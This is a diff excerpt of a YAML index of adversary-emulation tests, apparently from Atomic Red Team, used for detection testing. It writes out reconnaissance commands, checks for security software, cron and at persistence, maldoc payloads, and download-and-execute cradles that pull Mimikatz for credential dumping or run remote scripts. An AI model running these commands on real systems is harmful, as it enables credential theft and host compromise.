'tasklist -' + ' name: command_prompt T1012: technique: @@ -56096,7 +56096,7 @@ discovery: executor: command: 'net group "Domain Computers" /domain -' + ' name: command_prompt - name: Remote System Discovery - nltest auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 @@ -56114,7 +56114,7 @@ discovery: executor: command: 'nltest.exe /dclist:#{target_domain} -' + ' name: command_prompt - name: Remote System Discovery - ping sweep auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 
@@ -56127,7 +56127,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i -' + ' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 @@ -56138,7 +56138,7 @@ discovery: executor: command: 'arp -a -' + ' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -56153,17 +56153,17 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" executor: command: 'arp -a | grep -v ''^?'' -' + ' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -56191,7 +56191,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done -' + ' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f 
@@ -56236,35 +56236,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'adidnsdump must be installed and part of PATH -' + ' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} -' + ' get_prereq_command: 'pip3 install adidnsdump -' + ' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} -' + ' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects @@ -56283,14 +56283,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -56310,14 +56310,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt 
@@ -56331,17 +56331,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip neighbour show -' + ' name: sh - name: Remote System Discovery - ip route auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 @@ -56353,17 +56353,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip route show -' + ' name: sh - name: Remote System Discovery - ip tcp_metrics auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388 @@ -56375,17 +56375,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip tcp_metrics show |grep --invert-match "^127\." -' + ' name: sh T1518.001: technique: @@ -56487,7 +56487,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' -' + ' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 @@ -56499,7 +56499,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' -' + ' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 @@ -56512,7 +56512,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 -' + ' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI 
@@ -56589,7 +56589,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion -' + ' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b @@ -56609,7 +56609,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors -' + ' supported_platforms: - macos executor: @@ -56718,7 +56718,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -56728,7 +56728,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -56745,7 +56745,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -56755,7 +56755,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -56838,7 +56838,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. -' + ' supported_platforms: - windows executor: @@ -56850,7 +56850,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info -' + ' supported_platforms: - macos executor: 
@@ -56862,7 +56862,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info -' + ' supported_platforms: - linux - macos @@ -56879,14 +56879,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null -' + ' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -56905,7 +56905,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -56921,40 +56921,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. -' + ' supported_platforms: - windows executor: command: 'hostname -' + ' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. -' + ' supported_platforms: - linux - macos executor: command: 'hostname -' + ' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. -' + ' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid -' + ' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 
@@ -56979,27 +56979,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - windows executor: command: 'set -' + ' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - macos - linux executor: command: 'env -' + ' name: sh T1614: technique: @@ -57146,7 +57146,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all -' + ' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 @@ -57161,11 +57161,11 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" executor: @@ -57217,10 +57217,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist -' + ' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" @@ -57239,7 +57239,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" -' + ' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee 
@@ -57257,14 +57257,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt @@ -57393,7 +57393,7 @@ discovery: executor: command: 'Get-NetTCPConnection -' + ' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 @@ -57408,14 +57408,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; -' + ' executor: command: | netstat @@ -57449,10 +57449,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) -' + ' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" @@ -57631,10 +57631,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' name: command_prompt T1124: technique: @@ -57701,7 +57701,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. -' + ' supported_platforms: - windows input_arguments: 
@@ -57719,13 +57719,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. -' + ' supported_platforms: - windows executor: command: 'Get-Date -' + ' name: powershell - name: System Time Discovery in macOS auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f @@ -57736,7 +57736,7 @@ discovery: executor: command: 'date -' + ' name: sh T1497.003: technique: @@ -59368,11 +59368,11 @@ resource-development: dependencies: - description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable} -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip" Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force @@ -59383,7 +59383,7 @@ resource-development: cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1608.001: @@ -61370,7 +61370,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\\\" | python &\"" -' + ' name: sh T1053.001: technique: @@ -61427,7 +61427,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: 
@@ -61443,30 +61443,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -61563,7 +61563,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1059: technique: created: '2017-05-31T21:30:49.546Z' @@ -61860,7 +61860,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. -' + ' supported_platforms: - containers input_arguments: @@ -61875,20 +61875,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} -' + ' name: bash elevation_required: false T1053.007: @@ -61957,7 +61957,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -61968,17 +61968,17 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob 
@@ -61990,7 +61990,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -62001,20 +62001,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1053.003: @@ -62073,7 +62073,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -62093,7 +62093,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -62101,7 +62101,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -62133,7 +62133,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -62150,10 +62150,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1610: technique: external_references: @@ -62300,7 +62300,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word -' + ' supported_platforms: - windows executor: 
@@ -62323,13 +62323,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script -' + ' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx -' + ' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 @@ -62643,7 +62643,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl -' + ' supported_platforms: - macos input_arguments: @@ -62658,10 +62658,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} -' + ' cleanup_command: 'launchctl remove #{label_name} -' + ' name: bash T1053.004: technique: @@ -62802,7 +62802,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -62813,7 +62813,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62824,7 +62824,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62833,13 +62833,13 @@ execution: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file -' + ' supported_platforms: - windows input_arguments: 
@@ -62857,7 +62857,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 -' + ' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 @@ -62875,7 +62875,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62886,7 +62886,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62914,7 +62914,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62925,7 +62925,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62952,7 +62952,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62963,7 +62963,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62995,7 +62995,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed -' + ' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null 
@@ -63005,7 +63005,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement" -' + ' executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs" @@ -63077,7 +63077,7 @@ execution: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -63086,10 +63086,10 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' - description: 'Google Chrome must be installed -' + ' prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName @@ -63098,7 +63098,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -63107,7 +63107,7 @@ execution: name: powershell cleanup_command: 'Stop-Process -name mshta -' + ' - name: Potentially Unwanted Applications (PUA) auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: 'The Potentially Unwanted Applications (PUA) protection feature @@ -63119,7 +63119,7 @@ execution: instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). -' + ' supported_platforms: - windows input_arguments: 
@@ -63154,16 +63154,16 @@ execution: macro_path: description: 'Location of file which will be converted to a VBA macro -' + ' type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. -' + ' type: Url - default: + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server. @@ -63180,7 +63180,7 @@ execution: ms_product: description: 'Maldoc application Word or Excel -' + ' type: String default: Word dependency_executor_name: powershell @@ -63188,17 +63188,17 @@ execution: - description: 'Destination c2_domain name or IP address must be set to a running HTTP server. -' + ' prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1) -' + ' get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" -' + ' - description: 'Microsoftt #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -63209,7 +63209,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: name: powershell command: | @@ -63222,7 +63222,7 @@ execution: cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore -' + ' T1204.003: technique: external_references: @@ -63564,7 +63564,7 @@ execution: description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -63576,7 +63576,7 @@ execution: command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds" -' + ' name: command_prompt elevation_required: true - name: Run BloodHound from local disk 
@@ -63596,15 +63596,15 @@ execution: dependencies: - description: 'SharpHound.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" -' + ' executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan @@ -63613,7 +63613,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 @@ -63631,7 +63631,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 @@ -63639,7 +63639,7 @@ execution: out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" -' + ' supported_platforms: - windows executor: @@ -63654,7 +63654,7 @@ execution: will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. -' + ' supported_platforms: - windows executor: @@ -63685,7 +63685,7 @@ execution: command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''" -' + ' name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da 
@@ -63705,7 +63705,7 @@ execution: MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" -' + ' name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 @@ -63725,7 +63725,7 @@ execution: bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX" -' + ' name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af @@ -63743,7 +63743,7 @@ execution: executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()" -' + ' name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 @@ -63785,26 +63785,26 @@ execution: dependencies: - description: 'PowerShell version 2 must be installed -' + ' prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually -' + ' executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion -' + ' name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -63815,14 +63815,14 @@ execution: dependencies: - description: 'Homedrive must be an NTFS drive -' + ' prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically -' + ' executor: name: powershell command: | 
@@ -63831,7 +63831,7 @@ execution: Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore -' + ' - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: | @@ -63848,12 +63848,12 @@ execution: dependencies: - description: 'PSRemoting must be enabled -' + ' prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting -' + ' executor: name: powershell elevation_required: true @@ -63887,7 +63887,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction @@ -63923,7 +63923,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation @@ -63954,7 +63954,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute @@ -63990,7 +63990,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments 
@@ -64003,7 +64003,7 @@ execution: outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -64014,7 +64014,7 @@ execution: executor: command: 'powershell.exe -e #{obfuscated_code} -' + ' name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 @@ -64036,7 +64036,7 @@ execution: "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" -' + ' executor: name: powershell elevation_required: true @@ -64050,7 +64050,7 @@ execution: auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia -' + ' supported_platforms: - windows executor: @@ -64135,7 +64135,7 @@ execution: $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests -' + ' executor: command: | which_python=$(which python || which python3 || which python2) @@ -64175,7 +64175,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64202,7 +64202,7 @@ execution: an external malicious script then executes locally using the supplied executor and arguments -' + ' supported_platforms: - linux input_arguments: @@ -64236,7 +64236,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=$(which python || which python3 || which python2); 